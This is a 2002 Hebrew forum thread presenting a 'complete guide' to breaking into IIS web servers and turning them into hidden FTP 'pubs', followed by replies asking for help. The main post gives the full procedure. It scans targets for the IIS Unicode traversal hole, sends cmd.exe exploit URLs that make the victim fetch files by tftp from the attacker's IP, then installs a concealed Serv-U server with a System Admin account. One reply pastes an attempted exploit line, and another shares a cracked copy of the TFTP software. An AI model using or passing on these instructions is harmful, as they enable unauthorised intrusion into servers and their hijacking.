ABA


"המדריך המלא לפריצה לפאבים שתומכים ב IIS"
גירסת הדפסה   אשכול נעול - לקריאה בלבד
 
   
קבוצות דיון מדריכים, טריקים וטיפים נושא #7537 מנהל    סגן המנהל    מפקח   Winner    צל"ש   מומחה  
אשכול מספר 7537
madnaor
חבר מתאריך 20.3.02
21815 הודעות, 2 פידבק
   22:36   16.09.02   
אל הפורום  
  המדריך המלא לפריצה לפאבים שתומכים ב IIS  
 
כלים:
phack
לינק:

Serv-U Ftp Server
לינק:
http://www.serv-u.com/-גרסת 3+ חובה!!!

TFTPSuitePro2000
לינק:
http://www.walusoft.co.uk/

AccessDiver 4.5+
לינק:
http://www.accessdiver.com/ -גרסה 4.5 ומעלה!!!

ההתקנה

תכין תיקיה בכונן :c שלך בשם FTP ושפוך לתוכה את PHACK.zip

תתקין את Serv-U

תתקין את TFTPSuite ובהתקנה בחר רק את SERVER

תתקין את Access Diver

עכשיו תעתיק את הקובץ ServUDaemon.ini מ c:/FTP ל- c:\program files\serv-u (או איפה שהתקנה את Serv-U) ודרוס את הקובץ.

פתח את Serv-u Admin

התקנת Serv-U

http://planet.nana.co.il/timor5/תמונות%20למדריך/מדריך%20לפריצת%20פאבים/pubha11%2Ejpg

לחץ על Domains ואתה אמור לראות את ה FTP לחץ פעמיים על FTP

לחץ על FTP ובחר איזה פורט אתה רוצה שפאב היה ושאתה מסיים תעשה קליק ימני ו Apply.

עכשיו תלך ל Settings שם אתה תוכל לשנות את המספר משתמשים ועוד כמה שטויות.... ושאתה מסיים לחץ קליק ימני ו Apply.

לך ל Users קליק ימני על הקופסה של ה- Users ולחץ על New User.

בחר את היוזר ואת הסיסמא שאתה רוצה שהיה וב-Home Directory תרשום C:/ ובחר NO ב- Lock Users In Home Directory

אתה תהיה במסך של היוזר שלך, ב-Privilege בחר ב System Admin אתה יכול לשחק בהגדרות ב General זה לא כול כך חשוב .

לך ללשונית Dir Access וסמן את כ כול האפשריות שיש בצד ימין, ואז קליק ימני על היוזר ולחץ על Apply .

רצוי שתעשו עוד יוזר שהיה לכולם:

אז תעשו יוזר חדש כמו מקודם אבל ב diracces סמן הכול ב-V חוץ מהאפשרות של ה Delete כדאי שלא יוכלו למחוק לכם כלום

תעתיק את ה-ServUDaemon.ini מהתיקיה של Serv-U ל C:/FTP (דרוס את הקובץ)

התקנת TFTPSuitePro

התוכנה אמורה להיראות ככה:

http://planet.nana.co.il/timor5/תמונות%20למדריך/מדריך%20לפריצת%20פאבים/pubha12%2Ejpg

עכשיו לחץ על System->Setup וב- Inbound Path File , לחץ על Browse וסמן את C:\FTP שהכנו ולחץ OK.

אותו דבר ל-Outbound.

הפריצה

עכשיו פתח את Access Diver ולחץ בפינה השמאלית על My Skill->EXPLOITER.

לך ללשונית Exploiter ובפינה השמאלית יש סמל של תיקיה לחץ עלי לך לתיקיה C:/FTP שלנו ולחץ על IIS.INI.

עכשיו איפה שרשום Server צריך לרשום את כתובת הפאב עם http:// בהתחלה דוגמא: http://xxx.xxx.xxx.xx עכשיו לחץ על Scan

אחרי הסריקה את תראה שבכול שורה נהיה לינק.

http://planet.nana.co.il/timor5/תמונות%20למדריך/מדריך%20לפריצת%20פאבים/pubha13%2Ejpg

עם לאחד הלינקים יש סיומת (502) זה אומר שהפאב פריץ, עכשיו לחץ על אחד מהלינקים עם סיומת (502) ולחץ על העין בצד ימין.

עכשיו אמור להפתח לך האקספלואר והכתובת אמורה להראות ככה:./http://xxx.xxx.xxx.xx/scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c

עכשיו החלק הצהוב הוא ה-UniCode זה תלוי מאוד על איזה לינק עם (502) בחרתה.

עכשיו נחלק את ה-UniCode:

/:scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c/

החלק האדום הוא החלק הראשון של ה-UniCode והחלק הירוק הוא הפקודה או החלק השני של ה-UniCode

עכשיו שים לב שה-TftpSuitePro פועל.

עכשיו אנחנו צריכים לעלות את הקבצים של Serv-u לפאב

כך את החלק השני של ה-UniCode (החלק הירוק שבדרך כלל מתחיל ב- winnt) מחק אותו ותכניס את השורה הזאת:

winnt/system32/cmd.exe?/c+c:\winnt\system32\tftp.exe+"-i"+YourIPHere+get+WINMGNT.EXE+c:\WINMGNT.EXE

תשים לב שהכנסתה את ה-YourIPHere לשורה.

עכשיו אם אתה משתמש בסרבר שלי השורה צריכה להראות ככה:

http://xxx.xxx.xxx.xx/scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+c:\winnt\system32\tftp.exe+%22-i%22+YourIPHere+get+WINMGNT.EXE+c:\WINMGNT.EXE

שים את השורה באקספלואר ולחץ אנטר, עכשיו אתה אמור לראות ש TFTPSuitePro מעלה את הקובץ WINMGNT.EXE

שזה גומר להעלות את WINMGNT.EXE מיחקו איפה שכתוב WINMGNT.EXE בשורה הגדולה ובמקום זה שימו את הקובץ KILL.EXE וכך גם עם הקבצים:

WINLOGIN.EXE ו servudaemon.ini ו TLIST.EXE

עכשיו אחרי ש-TFTPSuitePro יעלה את כול הקבצים כך את השורה מההתחלה תוריד ממנה את החלק השני של ה-UniCode ותוסיף את השורה הבאה:

winnt/system32/cmd.exe?/c+c:\WINMGNT.EXE%20/h

ושים באקספלואר, עכשיו אם אתה משתמש בסרבר שלי זה השורה אמורה להראות ככה:

http://xxx.xxx.xxx.xx/scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+c:\WINMGNT.EXE%20/h

זה יקח זמן עד שהדף יטען אז לחץ על Stop אחרי 10 שניות

עכשיו הפאב צריך להתחיל לעבוד!!

בשביל לבדוק עם הפאב פועל תכנס אליו עם פורט היוזר והסיסמא שבחרתה.

שליטה על פאב

פתח את ה-Servu Admin לחץ על ה-Servu Servers למעלה ולחץ על New Server

עכשיו תכניס את האי פי של הפאב שפרצתה את הפורט שבחרנו מקודם בחר שם לשרת שים את היוזר והסיסמא שבחרנו ממקודם.

עכשיו אתה תראה אותו תחת Local Server עכשיו אתה יכול להוסיף יוזרים לשנות הגדרות אבל אל תשכח שאחרי כול דבר שאתה משנה\מוסיף בפאב את צריך ללחוץ קליק ימני ו- Apply.

בקרוב אני מוסיף עוד פקודות לשליטה על הפאב.

טיפים

בשביל שהפאב שלכם היה תומך FXP אתם צריכים ללכת ב Serv-U ל-settings ואז להוריד את ה-V ב-Block "FTP_bounce" Attacs and FXP

תהנו....




        שתף        
מכתב זה והנלווה אליו, על אחריות ועל דעת הכותב בלבד

  האשכול     מחבר     תאריך כתיבה     מספר  
  תודה אחי אבל אני מכיר את השיטה..ובכל זאת The HoT 16.09.02 09:50 1
  תודה רבה ! Dark-Slide 18.09.02 23:14 2
  תודה אבל קצת מסובך בשבילי, אם היו עוד תמונות _zoom 19.09.02 02:12 3
  אחיי Dark-Slide 21.09.02 19:19 4
     אחי, הבנתי את זה, אתה יכול להגיד לי מה האי סי Dark-Slide 21.09.02 13:47 5
         מכיר :)...מעניין מאיפה :) El Diablo 22.09.02 23:43 7
     דלג על החלק הזה, הftp זה פשוט איפה שרשום לך madnaor 22.09.02 23:43 6
         שמע אחי, הכל הולך טוב עד שאני שם לו את הקובץ Dark-Slide 23.09.02 08:44 9
  יש לי שאלה: Mystics  23.09.02 03:06 8
     לא ....לא צריך El Diablo 23.09.02 08:44 10
     מצטרף ! עוד מעט נגמרים לי הימים, Dark-Slide 23.09.02 08:44 11
         תודה רבה (: עומרי 23.09.02 19:53 12
  תודה רבה (: DevilBoy  25.09.02 21:26 13
  תודה רבה הנה קראק ל TFTP PRO... (תוקן) Vidi 26.09.02 15:55 14
     אממ שמתי לב שהקובץ הקודם לא טוב... אז העלתי Vidi 27.09.02 15:43 16
         תודה!! Dark-Slide 27.09.02 18:25 17
         תודה! DOMiNiON 27.09.02 21:14 18
  תודה אולי אתה מכיר סורק שרתי iis פרטים? Israel 27.09.02 16:03 19
  האתר של TFTPSuitePro2000 נפל ואני לא מוצא!! Zero - X 28.09.02 18:03 20
  יש לי בעיה Zero - X 28.09.02 19:22 21
  יוווווו משהו לא בסדר! Zero - X 28.09.02 19:22 22

       
The HoT
חבר מתאריך 1.7.02
253 הודעות
   09:50   16.09.02   
אל הפורום  
  1. תודה אחי אבל אני מכיר את השיטה..ובכל זאת  
בתגובה להודעה מספר 0
 
חידשת לי..אני מחכה לתוספת שלך בנוגע לשליטה


                                    (ניהול: מחק תגובה)
מכתב זה והנלווה אליו, על אחריות ועל דעת הכותב בלבד
Dark-Slide

   23:14   18.09.02   
אל הפורום  
  2. תודה רבה !  
בתגובה להודעה מספר 0
 
  


                                    (ניהול: מחק תגובה)
מכתב זה והנלווה אליו, על אחריות ועל דעת הכותב בלבד
_zoom

   02:12   19.09.02   
אל הפורום  
  3. תודה אבל קצת מסובך בשבילי, אם היו עוד תמונות  
בתגובה להודעה מספר 0
 
   היה הרבה יותר קל


                                    (ניהול: מחק תגובה)
מכתב זה והנלווה אליו, על אחריות ועל דעת הכותב בלבד
Dark-Slide

   19:19   21.09.02   
אל הפורום  
  4. אחיי  
בתגובה להודעה מספר 0
 
   "לחץ על Domains ואתה אמור לראות את ה FTP לחץ פעמיים על FTP"

איפה יש פה Domains?


                                    (ניהול: מחק תגובה)
מכתב זה והנלווה אליו, על אחריות ועל דעת הכותב בלבד
Dark-Slide

   13:47   21.09.02   
אל הפורום  
  5. אחי, הבנתי את זה, אתה יכול להגיד לי מה האי סי  
בתגובה להודעה מספר 4
 
   קיו שלך ?
אני צריך קצת עזרה .


                                    (ניהול: מחק תגובה)
מכתב זה והנלווה אליו, על אחריות ועל דעת הכותב בלבד
El Diablo

   23:43   22.09.02   
אל הפורום  
  7. מכיר :)...מעניין מאיפה :)  
בתגובה להודעה מספר 5
 
  


                                    (ניהול: מחק תגובה)
מכתב זה והנלווה אליו, על אחריות ועל דעת הכותב בלבד
madnaor
חבר מתאריך 20.3.02
21815 הודעות, 2 פידבק
   23:43   22.09.02   
אל הפורום  
  6. דלג על החלק הזה, הftp זה פשוט איפה שרשום לך  
בתגובה להודעה מספר 4
 
ftp server בצד, ואז שם אתה מכוון את הפורט וכ"ו...



                                    (ניהול: מחק תגובה)
מכתב זה והנלווה אליו, על אחריות ועל דעת הכותב בלבד
Dark-Slide

   08:44   23.09.02   
אל הפורום  
  9. שמע אחי, הכל הולך טוב עד שאני שם לו את הקובץ  
בתגובה להודעה מספר 6
 
   זה רושם לי DNS ERROR יש פיתרון?


                                    (ניהול: מחק תגובה)
מכתב זה והנלווה אליו, על אחריות ועל דעת הכותב בלבד
Mystics  לחץ כאן להצגת דירוג המשתמש
חבר מתאריך 18.3.02
45200 הודעות, 1 פידבק
   03:06   23.09.02   
אל הפורום  
  8. יש לי שאלה:  
בתגובה להודעה מספר 0
 
   יש קראק לתוכנת ה-TFTP?


ßarak,


                                    (ניהול: מחק תגובה)
מכתב זה והנלווה אליו, על אחריות ועל דעת הכותב בלבד
El Diablo

   08:44   23.09.02   
אל הפורום  
  10. לא ....לא צריך  
בתגובה להודעה מספר 8
 
  


                                    (ניהול: מחק תגובה)
מכתב זה והנלווה אליו, על אחריות ועל דעת הכותב בלבד
Dark-Slide

   08:44   23.09.02   
אל הפורום  
  11. מצטרף ! עוד מעט נגמרים לי הימים,  
בתגובה להודעה מספר 8
 
   אין לי כח להתעשק עם ה regedit ולמחוק את ההיסטוריה של התוכנה, בבקשה אם למישהו יש קראק אני אודה לו מאוד חיפשתי בכל האתרים שאני מכיר .


                                    (ניהול: מחק תגובה)
מכתב זה והנלווה אליו, על אחריות ועל דעת הכותב בלבד
עומרי

   19:53   23.09.02   
אל הפורום  
  12. תודה רבה (:  
בתגובה להודעה מספר 11
 
  


                                    (ניהול: מחק תגובה)
מכתב זה והנלווה אליו, על אחריות ועל דעת הכותב בלבד
DevilBoy 
חבר מתאריך 25.6.09
502 הודעות
   21:26   25.09.02   
אל הפורום  
  13. תודה רבה (:  
בתגובה להודעה מספר 0
 


                                    (ניהול: מחק תגובה)
מכתב זה והנלווה אליו, על אחריות ועל דעת הכותב בלבד
Vidi
חבר מתאריך 1.10.17
591 הודעות
   15:55   26.09.02   
אל הפורום  
  14. תודה רבה הנה קראק ל TFTP PRO... (תוקן)  
בתגובה להודעה מספר 0
 
הכותרת עברה עריכה לאחרונה בתאריך 26.09.02 בשעה 20:41 על-ידי מנהל
 
שנו את הסיומת ל-ACE




                                    (ניהול: מחק תגובה)
מכתב זה והנלווה אליו, על אחריות ועל דעת הכותב בלבד
Vidi
חבר מתאריך 1.10.17
591 הודעות
   15:43   27.09.02   
אל הפורום  
  16. אממ שמתי לב שהקובץ הקודם לא טוב... אז העלתי  
בתגובה להודעה מספר 14
 
לכם את התקייה של TFTP קבלו אותה...
ftp://213.237.101.213:21/_vti_pvt/tftp/Tftpsuite2.ace
ומצטער על הטעות...
תהנו


                                    (ניהול: מחק תגובה)
מכתב זה והנלווה אליו, על אחריות ועל דעת הכותב בלבד
Dark-Slide

   18:25   27.09.02   
אל הפורום  
  17. תודה!!  
בתגובה להודעה מספר 16
 
  


                                    (ניהול: מחק תגובה)
מכתב זה והנלווה אליו, על אחריות ועל דעת הכותב בלבד
DOMiNiON

   21:14   27.09.02   
אל הפורום  
  18. תודה!  
בתגובה להודעה מספר 16
 
  


                                    (ניהול: מחק תגובה)
מכתב זה והנלווה אליו, על אחריות ועל דעת הכותב בלבד
Israel
חבר מתאריך 1.8.02
2450 הודעות
   16:03   27.09.02   
אל הפורום  
  19. תודה אולי אתה מכיר סורק שרתי iis פרטים?  
בתגובה להודעה מספר 0
 
   בשביל שאני יוכל לנסות על כמה שרתים


                                    (ניהול: מחק תגובה)
מכתב זה והנלווה אליו, על אחריות ועל דעת הכותב בלבד
Zero - X

   18:03   28.09.02   
אל הפורום  
  20. האתר של TFTPSuitePro2000 נפל ואני לא מוצא!!  
בתגובה להודעה מספר 0
 
   בCNET ובTUCOWS אין את זה


                                    (ניהול: מחק תגובה)
מכתב זה והנלווה אליו, על אחריות ועל דעת הכותב בלבד
Zero - X

   19:22   28.09.02   
אל הפורום  
  21. יש לי בעיה  
בתגובה להודעה מספר 0
 
   שאני רושם את השורה אחרי האקסס דייבר
כלום לא קורה
ונראה לי שנתתי את האייפי של המודם ה200.10.1.1
מתי שפותחים את הTFTP בטעות


                                    (ניהול: מחק תגובה)
מכתב זה והנלווה אליו, על אחריות ועל דעת הכותב בלבד
Zero - X

   19:22   28.09.02   
אל הפורום  
  22. יוווווו משהו לא בסדר!  
בתגובה להודעה מספר 0
 
   שאני מכניס את האייפי שלי
אז מה שכתוב שם הוא
http://212.***.16.250/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+c:\winnt\system32\tftp.exe+"-i"+169.***.220.179+get+WINMGNT.EXE +c:\WINMGNT.EXE
שמתי בכוונה באייפי פה את הכוכביות כי אני לא רוצה שאף אחד שמסתובב בפורום יתחיל לנסות לפרוץ לי למחשב
והכוכביות בכתובת זה שאף אחד פה בפאב לא ישתלט לי על הפרויקט
ומתי שאני לוחץ אנטר הוא כותב לי
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
ודרך אגב מתי שפתחתי את הTFTP
הוא שאל אותי איזה אייפי להשתמש בטעות בחרתי את
היציאה של המודם :
10.200.1.1
ועכשיו בתוכנה כתוב לי למעלה איפה שהשם של התוכנה
10.200.1.1.69
מה אני עושה?


                                    (ניהול: מחק תגובה)
מכתב זה והנלווה אליו, על אחריות ועל דעת הכותב בלבד

תגובה מהירה  למכתב מספר: 
 
_________________________________________________________________________
למנהלים:  שחרר | תייק בארכיון | מחק | העבר לפורום אחר | מחק תגובות | עגן אשכול | עריכת אשכול
       



© כל הזכויות שמורות ל-רוטר.נט בע"מ rotter.net